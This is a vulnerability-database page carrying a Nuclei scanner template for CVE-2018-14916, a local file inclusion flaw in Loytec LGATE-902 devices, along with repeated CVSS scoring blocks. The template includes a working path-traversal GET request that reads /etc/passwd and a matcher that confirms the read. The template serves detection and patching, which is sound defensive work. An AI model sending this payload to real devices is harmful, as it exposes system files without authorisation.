Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-14916
HistoryNov 16, 2021 - 9:11 a.m.

Loytec LGATE-902 <6.4.2 - Local File Inclusion

2021-11-1609:11:29
ProjectDiscovery
github.com
4

9.4 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:N/I:C/A:C

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

9 High

AI Score

Confidence

High

0.007 Low

EPSS

Percentile

80.9%

Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability.

id: CVE-2018-14916

info:
  name: Loytec LGATE-902 <6.4.2 - Local File Inclusion
  author: 0x_Akoko
  severity: critical
  description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the device.
  remediation: |
    Upgrade the Loytec LGATE-902 device to version 6.4.2 or later to mitigate the vulnerability.
  reference:
    - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-14916
    - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
    - https://seclists.org/fulldisclosure/2019/Apr/12
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2018-14916
    cwe-id: CWE-732
    epss-score: 0.00644
    epss-percentile: 0.79217
    cpe: cpe:2.3:h:loytec:lgate-902:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: loytec
    product: lgate-902
  tags: cve2018,cve,loytec,lfi,packetstorm,seclists,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201431da7cb7d0c6f1cc9fe645c0cb50a7fd2bd61e9bf77564ef03316199d1e4f6022100f8c96bfcbbe4073e99071df37061329f4acf9403c04049f844f8d7c713c2ab0b:922c64590222798bb761d5b6d8e72950

9.4 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:N/I:C/A:C

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

9 High

AI Score

Confidence

High

0.007 Low

EPSS

Percentile

80.9%

Related for NUCLEI:CVE-2018-14916